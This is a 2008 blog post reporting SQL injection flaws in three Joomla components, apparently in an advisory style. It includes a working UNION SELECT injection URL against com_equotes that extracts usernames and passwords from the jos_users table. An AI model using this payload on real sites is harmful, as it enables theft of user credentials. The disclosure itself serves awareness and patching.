Joomla components suffer SQL injection risks.

by The Uni-Hacker on Jun.04, 2008, under Misc

Three Joomla components have been found to have some serious security issues, all three are susceptible to remote SQL injection via HTML GET. All three scripts, Joomla iDoBlog, Joomla Radio, and Joomla Quotes have the SQL injection exploit. This exploit was released today while yesterday two other Joomla components had similar issues with SQL injection.

The recent SQL injection exploits on these components raises the question of integrity and security of the software. As it stands now, users shouldn’t be using Joomla components if they don’t how to check for these sort of exploits.

SQL can be passed to all three components through the id argument.

http://localhost/[Joomla_Path]/index.php?option=com_equotes&id=13
and 1=1 UNION SELECT user(), user(),user(),user(),user(), concat(username,0x3a,password),
user(),user(),user(),user(),user(),user(), user(),user(),user(), user() FROM jos_users

:sql injection

Click the

to view the picture in full size.

Discussion

No comments for this entry yet...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Visit our friends!

A few highly recommended friends...

Joomla components suffer SQL injection risks.